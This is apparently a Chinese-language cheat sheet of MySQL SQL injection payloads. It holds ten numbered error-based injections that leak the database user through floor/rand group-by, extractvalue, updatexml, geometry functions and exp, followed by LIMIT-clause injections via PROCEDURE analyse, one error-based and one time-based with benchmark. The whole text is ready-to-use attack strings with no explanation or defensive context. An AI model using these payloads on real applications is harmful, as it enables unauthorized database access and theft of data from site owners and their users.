一、
and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)
二、
and (extractvalue(1,concat(0x5c,(select user()))));
三、
and (updatexml(1,concat(0x5e25,(select user()),0x5e25),1));
四、
and GeometryCollection((select * from(select * from(select user())a)b));
五、
and multipoint((select * from(select * from(select user())a)b));
六、
and polygon((select * from(select * from(select user())a)b));
七、
and multipolygon((select * from(select * from(select user())a)b));
八、
and linestring((select * from(select * from(select user())a)b));
九、
and multilinestring((select * from(select * from(select user())a)b));
十、
and exp(~(select * from(select user())a));
limit 注入
报错注入
1,1 PROCEDURE analyse(extractvalue(rand(),concat(0x3a,version())),1) -- a
时间
1 procedure analyse(extractvalue(rand(),concat(0x3a,(if(1=1,benchmark(10000000,sha1(1)),1)))),1);